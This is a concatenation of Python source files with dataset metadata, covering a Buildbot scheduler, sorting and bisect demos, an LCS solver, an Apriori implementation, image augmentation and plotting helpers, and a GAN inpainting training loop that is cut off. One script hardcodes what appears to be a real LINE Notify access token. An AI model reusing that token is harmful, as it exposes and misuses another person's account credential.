self.master.db.sourcestampsets.addSourceStampSet()\n\n yield self.master.db.sourcestamps.addSourceStamp(\n branch=branch, revision=revision, repository=repository,\n project=project, sourcestampsetid=setid)\n\n rv = yield self.addBuildsetForSourceStamp(\n setid=setid, reason=reason,\n external_idstring=external_idstring,\n builderNames=builderNames,\n properties=properties)\n defer.returnValue(rv)\n\n @defer.inlineCallbacks\n def addBuildsetForSourceStampSetDetails(self, reason, sourcestamps,\n properties, builderNames=None):\n if sourcestamps is None:\n sourcestamps = {}\n\n # Define new setid for this set of sourcestamps\n new_setid = yield self.master.db.sourcestampsets.addSourceStampSet()\n\n # Merge codebases with the passed list of sourcestamps\n # This results in a new sourcestamp for each codebase\n for codebase in self.codebases:\n ss = self.codebases[codebase].copy()\n # apply info from passed sourcestamps onto the configured default\n # sourcestamp attributes for this codebase.\n ss.update(sourcestamps.get(codebase, {}))\n\n # add sourcestamp to the new setid\n yield self.master.db.sourcestamps.addSourceStamp(\n codebase=codebase,\n repository=ss.get('repository', ''),\n branch=ss.get('branch', None),\n revision=ss.get('revision', None),\n project=ss.get('project', ''),\n changeids=[c['number'] for c in ss.get('changes', [])],\n patch_body=ss.get('patch_body', None),\n patch_level=ss.get('patch_level', None),\n patch_author=ss.get('patch_author', None),\n patch_comment=ss.get('patch_comment', None),\n sourcestampsetid=new_setid)\n\n rv = yield self.addBuildsetForSourceStamp(\n setid=new_setid, reason=reason,\n properties=properties,\n builderNames=builderNames)\n\n defer.returnValue(rv)\n\n def getCodebaseDict(self, codebase):\n # Hook for subclasses to change codebase parameters when a codebase does\n # not have a change associated with it.\n return self.codebases[codebase]\n\n @defer.inlineCallbacks\n def addBuildsetForChanges(self, reason='', external_idstring=None,\n changeids=[], builderNames=None, properties=None):\n changesByCodebase = {}\n\n def get_last_change_for_codebase(codebase):\n return max(changesByCodebase[codebase], key=lambda change: change[\"changeid\"])\n\n # Define setid for this set of changed repositories\n setid = yield self.master.db.sourcestampsets.addSourceStampSet()\n\n # Changes are retrieved from database and grouped by their codebase\n for changeid in changeids:\n chdict = yield self.master.db.changes.getChange(changeid)\n # group change by codebase\n changesByCodebase.setdefault(chdict[\"codebase\"], []).append(chdict)\n\n for codebase in self.codebases:\n args = {'codebase': codebase, 'sourcestampsetid': setid}\n if codebase not in changesByCodebase:\n # codebase has no changes\n # create a sourcestamp that has no changes\n cb = self.getCodebaseDict(codebase)\n args['repository'] = cb['repository']\n args['branch'] = cb.get('branch', None)\n args['revision'] = cb.get('revision', None)\n args['changeids'] = set()\n args['project'] = ''\n else:\n # codebase has changes\n args['changeids'] = [c[\"changeid\"] for c in changesByCodebase[codebase]]\n lastChange = get_last_change_for_codebase(codebase)\n for key in ['repository', 'branch', 'revision', 'project']:\n args[key] = lastChange[key]\n\n yield self.master.db.sourcestamps.addSourceStamp(**args)\n\n # add one buildset, this buildset is connected to the sourcestamps by the setid\n bsid, brids = yield self.addBuildsetForSourceStamp(setid=setid,\n reason=reason, external_idstring=external_idstring,\n builderNames=builderNames, properties=properties)\n\n defer.returnValue((bsid, brids))\n\n @defer.inlineCallbacks\n def addBuildsetForSourceStamp(self, ssid=None, setid=None, reason='', external_idstring=None,\n properties=None, builderNames=None):\n \"\"\"\n Add a buildset for the given, already-existing sourcestamp.\n\n This method will add any properties provided to the scheduler\n constructor to the buildset, and will call the master's\n L{BuildMaster.addBuildset} method with the appropriate parameters, and\n return the same result.\n\n @param reason: reason for this buildset\n @type reason: unicode string\n @param external_idstring: external identifier for this buildset, or None\n @param properties: a properties object containing initial properties for\n the buildset\n @type properties: L{buildbot.process.properties.Properties}\n @param builderNames: builders to name in the buildset (defaults to\n C{self.builderNames})\n @param setid: idenitification of a set of sourcestamps\n @returns: (buildset ID, buildrequest IDs) via Deferred\n \"\"\"\n assert (ssid is None and setid is not None) \\\n or (ssid is not None and setid is None), \"pass a single sourcestamp OR set not both\"\n\n # combine properties\n if properties:\n properties.updateFromProperties(self.properties)\n else:\n properties = self.properties\n\n # apply the default builderNames\n if not builderNames:\n builderNames = self.builderNames\n\n # translate properties object into a dict as required by the\n # addBuildset method\n properties_dict = properties.asDict()\n\n if setid is None:\n if ssid is not None:\n ssdict = yield self.master.db.sourcestamps.getSourceStamp(ssid)\n setid = ssdict['sourcestampsetid']\n else:\n # no sourcestamp and no sets\n yield None\n\n rv = yield self.master.addBuildset(sourcestampsetid=setid,\n reason=reason, properties=properties_dict,\n builderNames=builderNames,\n external_idstring=external_idstring)\n defer.returnValue(rv)\n", "repo_name": "jollyroger/debian-buildbot", "sub_path": "buildbot/schedulers/base.py", "file_name": "base.py", "file_ext": "py", "file_size_in_byte": 18731, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "52", "api": [{"api_name": "twisted.application.service.MultiService", "line_number": 13, "usage_type": "attribute"}, {"api_name": "twisted.application.service", "line_number": 13, "usage_type": "name"}, {"api_name": "buildbot.util.ComparableMixin", "line_number": 13, "usage_type": "name"}, {"api_name": "buildbot.util.state.StateMixin", "line_number": 13, "usage_type": "name"}, {"api_name": "zope.interface.implements", "line_number": 24, "usage_type": "call"}, {"api_name": "buildbot.interfaces.IScheduler", "line_number": 24, "usage_type": "attribute"}, {"api_name": "buildbot.interfaces", "line_number": 24, "usage_type": "name"}, {"api_name": "twisted.application.service.MultiService.__init__", "line_number": 56, "usage_type": "call"}, {"api_name": "twisted.application.service.MultiService", "line_number": 56, "usage_type": "attribute"}, {"api_name": "twisted.application.service", "line_number": 56, "usage_type": "name"}, {"api_name": "buildbot.config.error", "line_number": 68, "usage_type": "call"}, {"api_name": "buildbot.config", "line_number": 68, "usage_type": "name"}, {"api_name": "buildbot.process.properties.Properties", "line_number": 75, "usage_type": "call"}, {"api_name": "buildbot.config.error", "line_number": 88, "usage_type": "call"}, {"api_name": "buildbot.config", "line_number": 88, "usage_type": "name"}, {"api_name": "buildbot.config.error", "line_number": 91, "usage_type": "call"}, {"api_name": "buildbot.config", "line_number": 91, "usage_type": "name"}, {"api_name": "buildbot.config.error", "line_number": 94, "usage_type": "call"}, {"api_name": "buildbot.config", "line_number": 94, "usage_type": "name"}, {"api_name": "buildbot.config.error", "line_number": 96, "usage_type": "call"}, {"api_name": "buildbot.config", "line_number": 96, "usage_type": "name"}, {"api_name": "twisted.internet.defer.DeferredLock", "line_number": 102, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 102, "usage_type": "name"}, {"api_name": "twisted.application.service.MultiService.startService", "line_number": 107, "usage_type": "call"}, {"api_name": "twisted.application.service.MultiService", "line_number": 107, "usage_type": "attribute"}, {"api_name": "twisted.application.service", "line_number": 107, "usage_type": "name"}, {"api_name": "twisted.internet.defer.maybeDeferred", "line_number": 113, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 113, "usage_type": "name"}, {"api_name": "twisted.application.service.MultiService.stopService", "line_number": 114, "usage_type": "call"}, {"api_name": "twisted.application.service.MultiService", "line_number": 114, "usage_type": "attribute"}, {"api_name": "twisted.application.service", "line_number": 114, "usage_type": "name"}, {"api_name": "twisted.python.log.msg", "line_number": 163, "usage_type": "call"}, {"api_name": "twisted.python.log", "line_number": 163, "usage_type": "name"}, {"api_name": "twisted.python.log.err", "line_number": 173, "usage_type": "call"}, {"api_name": "twisted.python.log", "line_number": 173, "usage_type": "name"}, {"api_name": "twisted.python.failure.Failure", "line_number": 173, "usage_type": "call"}, {"api_name": "twisted.python.failure", "line_number": 173, "usage_type": "name"}, {"api_name": "twisted.python.log.err", "line_number": 182, "usage_type": "attribute"}, {"api_name": "twisted.python.log", "line_number": 182, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 185, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 185, "usage_type": "name"}, {"api_name": "twisted.internet.defer.returnValue", "line_number": 266, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 266, "usage_type": "name"}, {"api_name": "twisted.internet.defer.inlineCallbacks", "line_number": 217, "usage_type": "attribute"}, {"api_name": "twisted.internet.defer", "line_number": 217, "usage_type": "name"}, {"api_name": "twisted.internet.defer.returnValue", "line_number": 302, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 302, "usage_type": "name"}, {"api_name": "twisted.internet.defer.inlineCallbacks", "line_number": 268, "usage_type": "attribute"}, {"api_name": "twisted.internet.defer", "line_number": 268, "usage_type": "name"}, {"api_name": "twisted.internet.defer.returnValue", "line_number": 340, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 340, "usage_type": "name"}, {"api_name": "twisted.internet.defer.inlineCallbacks", "line_number": 304, "usage_type": "attribute"}, {"api_name": "twisted.internet.defer", "line_number": 304, "usage_type": "name"}, {"api_name": "twisted.internet.defer.returnValue", "line_number": 389, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 389, "usage_type": "name"}, {"api_name": "twisted.internet.defer.inlineCallbacks", "line_number": 347, "usage_type": "attribute"}, {"api_name": "twisted.internet.defer", "line_number": 347, "usage_type": "name"}, {"api_name": "twisted.internet.defer.returnValue", "line_number": 442, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 442, "usage_type": "name"}, {"api_name": "twisted.internet.defer.inlineCallbacks", "line_number": 391, "usage_type": "attribute"}, {"api_name": "twisted.internet.defer", "line_number": 391, "usage_type": "name"}]} +{"seq_id": "39404886021", "text": "import bisect\nimport random\nfrom typing import List\n\nSIZE = 15\n\nfruits = ['grape', 'raspberry', 'apple', 'banana', 'pineapple-pie']\nprint(sorted(fruits, key=len))\nfruits.sort()\nprint(fruits)\n\nprint('use bisect perfrom table lookup')\n\n\ndef grade(score, breakpoints=[60, 70, 80, 90], grades='FDCBA'):\n i = bisect.bisect(breakpoints, score)\n return grades[i]\n\n\nprint([grade(score) for score in [33, 99, 77, 70, 89, 90, 100]])\n\n# use insort to maintain the order of sequence while inserting.\nprint('use bisect insort')\nrandom.seed(1729)\n\nalist: List[int] = []\nfor i in range(SIZE):\n new = random.randrange(SIZE * 2)\n bisect.insort(alist, new)\n print('{:2d} ->'.format(new), alist)\n", "repo_name": "Ailrk-sArchives/trash", "sub_path": "ARCHIVE/python/fluent-python/sorts.py", "file_name": "sorts.py", "file_ext": "py", "file_size_in_byte": 692, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "bisect.bisect", "line_number": 16, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 24, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 26, "usage_type": "name"}, {"api_name": "random.randrange", "line_number": 28, "usage_type": "call"}, {"api_name": "bisect.insort", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "16761305294", "text": "from functools import lru_cache\nstrx='abracadabra'\nstry='avadakedavra'\n@lru_cache(None)\ndef dp(i,j):\n if i>=len(strx) or j>=len(stry):\n return 0\n if strx[i]==stry[j]:\n\n return 1+dp(i+1,j+1)\n else:\n return max(dp(i+1,j),dp(i,j+1))\n\nprint(dp(0,0))\n\n#converstion into tabular\ndp=[[0 for i in range(len(stry)+1)] for j in range(len(strx)+1)]\n\nfor i in range(1,len(strx)+1):\n for j in range(1,len(stry)+1):\n if strx[i-1]==stry[j-1]:\n dp[i][j]=1+dp[i-1][j-1]\n else:\n dp[i][j]=max(dp[i-1][j],dp[i][j-1])\n\nprint(dp[-1][-1])\nprint(dp)\n#printing out the string\ni=len(strx)\nj=len(stry)\nresult=\"\"\n\nwhile i>0 and j>0:\n if dp[i][j-1]==dp[i][j]:\n j-=1\n elif dp[i-1][j]==dp[i][j] :\n i-=1\n result+=strx[i-1]\n i-=1\n j-=1\nprint(result[::-1])\n\n", "repo_name": "jagdishwar/CP", "sub_path": "Atcoder_DP/longest common subsequence.py", "file_name": "longest common subsequence.py", "file_ext": "py", "file_size_in_byte": 850, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "functools.lru_cache", "line_number": 4, "usage_type": "call"}]} +{"seq_id": "16733043980", "text": "\nimport requests\n\n# LINE Notify 權杖\ntoken = 'kkpN8FrEG1wfMoDVc2NbuETr30MlfSs1rLnRh0vX3jR'\n# 要發送的訊息\nmessage = '這是test'\n# HTTP 標頭參數與資料\nheaders = { \"Authorization\": \"Bearer \" + token }\ndata = { 'message': message ,\n 'stickerPackageId': '11539', # 貼圖編號\n 'stickerId': '52114118', # 貼圖序號\n }\n# 以 requests 發送 POST 請求\nrequests.post(\"https://notify-api.line.me/api/notify\",\n headers = headers, data = data)\n\n# # 要傳送的圖片檔案\nimage = open('https://yabeline.tw/Stickers_Data.php?Number=1448326', 'rb')\nfiles = { 'imageFile': image }\n\n", "repo_name": "mengqi1998/pythonProject1", "sub_path": "test_0812.py", "file_name": "test_0812.py", "file_ext": "py", "file_size_in_byte": 622, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.post", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "73480810406", "text": "import argparse\nfrom pddl import Problem, Utils, Domain\nfrom compilation import HaslumCompilation\n\n\ndef verify_parens(domain_string):\n count = 0\n remaining_string = domain_string\n while remaining_string.find('(') >= 0 or remaining_string.find(')') >= 0:\n left_idx = remaining_string.find('(')\n right_idx = remaining_string.find(')')\n if right_idx > left_idx >= 0:\n split = left_idx\n count += 1\n else:\n split = right_idx\n count -= 1\n remaining_string = remaining_string[split + 1:]\n if count < 0:\n return False\n return count == 0\n\n\nif __name__ == '__main__':\n args = argparse.ArgumentParser(description='Process Domain and Problem Files.')\n args.add_argument('-d','--domain', type=str, help='The Domain File', default=r'../samples/aladdin-domain.pddl')\n args.add_argument('-p','--problem', type=str, help='The Problem File', default=r'../samples/aladdin-problem.pddl')\n arguments = args.parse_args()\n\n domain_string = ''\n prob_string = ''\n with open(arguments.domain) as domF:\n for line in domF:\n trimmed = line[:line.find(';')].strip()\n if trimmed:\n domain_string += trimmed + '\\n'\n verify_parens(domain_string)\n child, _ = Utils.find_child(domain_string)\n # print(child)\n\n with open(arguments.problem) as probF:\n for line in probF:\n trimmed = line[:line.find(';')].strip()\n if trimmed:\n prob_string += trimmed + '\\n'\n\n verify_parens(prob_string)\n problem_child, _ = Utils.find_child(prob_string)\n\n prob = Problem.Problem(problem_child)\n dom = Domain.Domain(child)\n\n # print(dom.string)\n # print(\"------------\")\n # for kid in dom.predicates:\n # print(\"<\" + kid.replace('\\n', ' | ') + \">\")\n # dom.print_actions()\n\n compilation = HaslumCompilation(dom, prob)\n\n print(compilation.compiled_domain().to_pddl())\n\n\n\n\n\n", "repo_name": "qed-lab/belief-intention-compilation", "sub_path": "intention_compiler/parsee.py", "file_name": "parsee.py", "file_ext": "py", "file_size_in_byte": 1978, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 25, "usage_type": "call"}, {"api_name": "pddl.Utils.find_child", "line_number": 38, "usage_type": "call"}, {"api_name": "pddl.Utils", "line_number": 38, "usage_type": "name"}, {"api_name": "pddl.Utils.find_child", "line_number": 48, "usage_type": "call"}, {"api_name": "pddl.Utils", "line_number": 48, "usage_type": "name"}, {"api_name": "pddl.Problem.Problem", "line_number": 50, "usage_type": "call"}, {"api_name": "pddl.Problem", "line_number": 50, "usage_type": "name"}, {"api_name": "pddl.Domain.Domain", "line_number": 51, "usage_type": "call"}, {"api_name": "pddl.Domain", "line_number": 51, "usage_type": "name"}, {"api_name": "compilation.HaslumCompilation", "line_number": 59, "usage_type": "call"}, {"api_name": "compilation.compiled_domain", "line_number": 61, "usage_type": "call"}]} +{"seq_id": "7433178844", "text": "import numpy as np\nfrom multiprocessing import Queue\n\nimport scipy\nimport scipy.ndimage\nimport cv2\n\ndef prepare_batches(y_edge, data, q):\n while True:\n angle = np.random.randint(-17, 17) \n batchx = scipy.ndimage.interpolation.rotate(data, angle, (1, 2), False, mode=\"constant\", cval=0)\n batchy = scipy.ndimage.interpolation.rotate(y_edge, angle, (1, 2), False, mode=\"constant\", cval=-1)\n \n batchx = np.clip(batchx, 0, 1)\n\n #batchx = np.concatenate([batchx, -batchx]) / 255.\n\n maxcrop = 40\n shape = batchx[0].shape\n \n final_x = []\n final_y = []\n for i in range(len(batchx)):\n \n while True:\n \n x1 = np.random.randint(0, maxcrop)\n x2 = np.random.randint(256 - maxcrop, 256)\n\n y1 = np.random.randint(0, maxcrop)\n y2 = np.random.randint(256 - maxcrop, 256)\n\n y_test = batchy[i, x1:x2, y1:y2]\n\n if not(np.any(y_test == -1)):\n break\n \n final_x.append(cv2.resize(batchx[i, x1:x2, y1:y2], (128, 128)))\n final_y.append(cv2.resize(batchy[i, x1:x2, y1:y2], (128, 128)))\n \n\n \n \n batchx = np.array(final_x)\n batchy = np.array(final_y)\n \n print(batchx.shape)\n print(batchy.shape)\n batchx = np.expand_dims(batchx, -1)\n\n batchy = np.expand_dims(batchy, -1)\n batchy = np.concatenate([batchy, 1-batchy], -1)\n \n batchx = np.concatenate([batchx, np.flip(batchx, 2)])\n batchy = np.concatenate([batchy, np.flip(batchy, 2)])\n \n #batchx = np.concatenate([batchx, np.flip(batchx, 1)])\n #batchy = np.concatenate([batchy, np.flip(batchy, 1)])\n \n #batchx = np.concatenate([batchx, np.transpose(batchx, (0, 2, 1, 3))])\n #batchy = np.concatenate([batchy, np.transpose(batchy, (0, 2, 1, 3))])\n \n #offset = np.random.random((len(batchx), 1, 1, 1)) / 4 - .125\n #scale = np.random.random((len(batchx), 1, 1, 1)) / 2 + .75\n \n #batchx = scale * batchx + offset\n \n scale = np.random.uniform(-1.4, 1.4, (len(batchx), 1, 1, 1))\n\n batchx = (batchx + 0.0) ** ( 2.5 **scale)\n q.put((batchx, batchy))", "repo_name": "SlicerIGT/aigt", "sub_path": "Notebooks/examples/augmentor.py", "file_name": "augmentor.py", "file_ext": "py", "file_size_in_byte": 2320, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 50, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.random.randint", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 10, "usage_type": "attribute"}, {"api_name": "scipy.ndimage.interpolation.rotate", "line_number": 11, "usage_type": "call"}, {"api_name": "scipy.ndimage", "line_number": 11, "usage_type": "attribute"}, {"api_name": "scipy.ndimage.interpolation.rotate", "line_number": 12, "usage_type": "call"}, {"api_name": "scipy.ndimage", "line_number": 12, "usage_type": "attribute"}, {"api_name": "numpy.clip", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 27, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 28, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 30, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 31, "usage_type": "attribute"}, {"api_name": "numpy.any", "line_number": 35, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 38, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 68, "usage_type": "attribute"}]} +{"seq_id": "7832501281", "text": "from itertools import count\r\nfrom collections import Counter\r\nfrom collections.abc import Generator, Iterable\r\n\r\ndef cartesian_product(items: Iterable[str], n_set: int) \\\r\n -> Generator[str, None, None]:\r\n \"\"\"\r\n This function returns the cartesian product\r\n of the items with itself. The n_set is used \r\n to determine the total length of each element\r\n in the resulting set.\r\n\r\n ----------\r\n Parameters\r\n ----------\r\n items: List of items.\r\n n_set: A positive integer.\r\n\r\n -------\r\n Returns\r\n -------\r\n This is a generator function that yields each\r\n element for the resulting set.\r\n \"\"\"\r\n \r\n for i in range(len(items) - 1):\r\n item_group: str = items[i]\r\n\r\n for j in range(i + 1, len(items)):\r\n s: set = set(item_group).union(items[j])\r\n\r\n if (len(s) == n_set):\r\n yield ''.join(sorted(s))\r\n\r\n\r\ndef get_freq(items: Iterable[str], transactions: list[set[str]], \r\n frequencies: Counter) -> None:\r\n \"\"\"\r\n This function calculates how many times an item group\r\n ocuured in all the transactions. An item group has\r\n occured in a single transaction when every items in\r\n the item group are present in that transaction.\r\n\r\n ----------\r\n Parameters\r\n ----------\r\n items : List of items.\r\n transactions: List of transactions.\r\n frequencies : Dict storing frequencies of every item group.\r\n\r\n -------\r\n Returns\r\n -------\r\n This function mutates the `frequencies` that is passed\r\n and returns None.\r\n \"\"\"\r\n for transaction in transactions:\r\n for item_group in items:\r\n # if all the item in the item group is in \r\n # the transaction\r\n if (all(item in transaction for item in item_group)):\r\n frequencies[item_group] += 1\r\n\r\n\r\ndef apriori(items: Iterable[str], transactions: list[set[str]], \r\n min_support: float) -> dict:\r\n \"\"\"\r\n This function returns all the frequent patterns that\r\n has at least the given minimum support using apriori \r\n algorithm.\r\n\r\n ----------\r\n Parameters\r\n ----------\r\n items : List of items.\r\n transactions: List of transactions.\r\n min_support : Decimal number between 0 and 1\r\n denoting minimum support.\r\n\r\n -------\r\n Returns\r\n -------\r\n All the item groups having a support equal or greater \r\n than the minimum support.\r\n \"\"\"\r\n L: dict = {}\r\n frequencies: Counter = Counter()\r\n\r\n for n_set in count(start=1):\r\n get_freq(items, transactions, frequencies)\r\n support: dict = {\r\n item_group: frequencies[item_group] / len(transactions) \r\n for item_group in items\r\n }\r\n # Get items whose value is greater than or \r\n # equal to the minimum support\r\n L_temp: dict = {\r\n item_group: support[item_group] \r\n for item_group in support \r\n if support[item_group] >= min_support\r\n }\r\n # Clear the `frequencies` to save memory\r\n frequencies.clear()\r\n # If `L_temp` is empty, break out of the loop\r\n if (not L_temp):\r\n break\r\n\r\n L: dict = {**L, **L_temp}\r\n items: set = set(cartesian_product(tuple(L_temp.keys()), n_set + 1))\r\n\r\n return L\r\n\r\n\r\ndef get_rules(itemsets: dict, conf_lvl: float) \\\r\n -> list[tuple[str, str, float]]:\r\n \"\"\"\r\n This function returns all the association\r\n rules present in the given itemset that is\r\n above or equal to the minimum confidence\r\n level.\r\n\r\n For X and Y be any arbitrary item group in\r\n a given itemset, the conditions for finding \r\n association rules are as follows:\r\n\r\n 1. X -> Y is possible if XY is also present\r\n in the itemset.\r\n\r\n 2. X -> Y is possible is X ∩ Y = Φ.\r\n\r\n ----------\r\n Parameters\r\n ----------\r\n itemsets : Dicts containing item groups \r\n along with their support.\r\n conf_lvl : Decimal number between 0 and 1\r\n denoting a minimum confidence.\r\n\r\n -------\r\n Returns\r\n -------\r\n List of association rules that are equal or\r\n greater than the minimum confidence.\r\n \"\"\"\r\n rules = []\r\n item_groups = tuple(itemsets.keys())\r\n N = len(item_groups)\r\n\r\n for i in range(N - 1):\r\n X: str = item_groups[i]\r\n \r\n for j in range(i, N):\r\n Y: str = item_groups[j]\r\n if (len(set(X) & set(Y)) != 0): continue\r\n item_group: str = ''.join(sorted(set(X) | set(Y)))\r\n if (itemsets.get(item_group) is None): continue\r\n\r\n conf_x_y: float = itemsets[item_group] / itemsets[X]\r\n conf_y_x: float = itemsets[item_group] / itemsets[Y]\r\n\r\n if (conf_x_y >= conf_lvl): rules.append((X, Y, conf_x_y))\r\n if (conf_y_x >= conf_lvl): rules.append((Y, X, conf_y_x))\r\n\r\n return rules\r\n\r\n\r\nif __name__ == \"__main__\":\r\n transactions = [\r\n {'A', 'C', 'E'}, # Transaction 1\r\n {'C', 'E', 'F'}, # Transaction 2\r\n {'A', 'B', 'G'}, # Transaction 3\r\n {'A', 'D'}, # Transaction 4\r\n {'C', 'E', 'F', 'G'} # Transaction 5\r\n ]\r\n min_support = 0.3\r\n frequencies = Counter()\r\n items = ('A', 'B', 'C', 'D', 'E', 'F', 'G')\r\n result = apriori(items, transactions, min_support)\r\n\r\n for k, v in result.items():\r\n print(f\"{k} = {v}\")", "repo_name": "J16N/Data-Mining", "sub_path": "apriori_algo.py", "file_name": "apriori_algo.py", "file_ext": "py", "file_size_in_byte": 5459, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "collections.abc.Iterable", "line_number": 5, "usage_type": "name"}, {"api_name": "collections.abc.Generator", "line_number": 6, "usage_type": "name"}, {"api_name": "collections.abc.Iterable", "line_number": 36, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 37, "usage_type": "name"}, {"api_name": "collections.abc.Iterable", "line_number": 65, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 87, "usage_type": "name"}, {"api_name": "itertools.count", "line_number": 89, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 176, "usage_type": "call"}]} +{"seq_id": "73263116006", "text": "import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import colors\n\n\ndef imshow_helper(img, ax, title, cmap=None, xticks=False, yticks=False):\n ax.imshow(img, cmap=cmap)\n ax.set_title(title)\n if not xticks:\n ax.set_xticks([])\n if not yticks:\n ax.set_yticks([])\n\n\ndef visualize(input_image, img_type):\n # Fill in this function. Remember to remove the pass command\n\n img_type_to_channels = {\n \"opponent\": [\"O1\", \"O2\", \"O3\"],\n \"rgb\": [\"r\", \"g\", \"b\"],\n \"ycbcr\": [\"Y\", \"Cb\", \"Cr\"],\n \"hsv\": [\"Hue\", \"Saturation\", \"Value\"],\n \"original\": [\"R\", \"G\", \"B\"],\n }\n\n fig, ax = plt.subplots(1, 4, figsize=(10, 4))\n\n if img_type == \"gray\":\n # plot 4 variants of gray-scale image\n titles = [\"Lightness\", \"Average\", \"Luminosity\", \"OpenCV\"]\n assert input_image.shape[-1] == 4\n for i in range(input_image.shape[-1]):\n imshow_helper(input_image[..., i], ax[i], titles[i], cmap=\"gray\")\n\n else:\n # set complete image\n imshow_helper(input_image, ax[0], \"Converted image\", cmap=\"gray\")\n\n # set individual channels\n for i in range(3):\n imshow_helper(\n input_image[..., i], ax[i + 1],\n \"Channel {}\".format(img_type_to_channels[img_type][i]),\n cmap=\"gray\"\n )\n\n fpath = \"./{}.png\".format(img_type)\n plt.savefig(fpath, bbox_inches=\"tight\")\n\n plt.show()\n", "repo_name": "bpiyush/CV1labs", "sub_path": "lab1/colourspace/visualize.py", "file_name": "visualize.py", "file_ext": "py", "file_size_in_byte": 1469, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "matplotlib.pyplot.subplots", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}]} +{"seq_id": "17244665837", "text": "import os\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\nimport torchvision.utils as vutils\nfrom data.data import InpaintingDataset, ToTensor\nfrom model.net import InpaintingModel_GMCNN\nfrom options.train_options import TrainOptions\nfrom util.utils import getLatest\n\nconfig = TrainOptions().parse()\n\nprint('loading data..')\ndataset = InpaintingDataset(config.dataset_path, '', transform=transforms.Compose( [ToTensor()] ))\ndataloader = DataLoader(dataset, batch_size=config.batch_size, shuffle=True, num_workers=0, drop_last=True)\nprint('data loaded..')\n\nprint('Preparing model..')\nourModel = InpaintingModel_GMCNN(in_channels=4, opt=config)\n\nif config.load_model_dir != '':\n ourModel.load_networks(getLatest(os.path.join(config.load_model_dir, '*.pth')))\n\nprint('Initializing training..')\n\nfor epoch in range(config.epochs):\n\n for i, data in enumerate(dataloader):\n gt = data['gt'].cuda()\n gt = gt / 127.5 - 1\n\n data_in = {'gt': gt}\n ourModel.setInput(data_in)\n ourModel.optimize_parameters()\n\n if (i+1) % config.viz_steps == 0:\n loss = ourModel.get_current_losses()\n if config.pretrain_network is False:\n print(\n '[%d, %5d] G_loss: %.4f (rec: %.4f, ae: %.4f, adv: %.4f, mrf: %.4f), D_loss: %.4f'\n % (epoch + 1, i + 1, loss['G_loss'], loss['G_loss_rec'], loss['G_loss_ae'],\n loss['G_loss_adv'], loss['G_loss_mrf'], loss['D_loss']))\n else:\n print('[%d, %5d] G_loss: %.4f (rec: %.4f, ae: %.4f)'\n % (epoch + 1, i + 1, loss['G_loss'], loss['G_loss_rec'], loss['G_loss_ae']))\n\n images = ourModel.get_current_visuals_tensor()\n image_completed = vutils.make_grid(images['completed'], normalize=True, scale_each=True)\n image_input = vutils.make_grid(images['input'], normalize=True, scale_each=True)\n image_gt = vutils.make_grid(images['gt'], normalize=True, scale_each=True)\n if (i+1) % config.train_spe == 0:\n print('saving model ..')\n 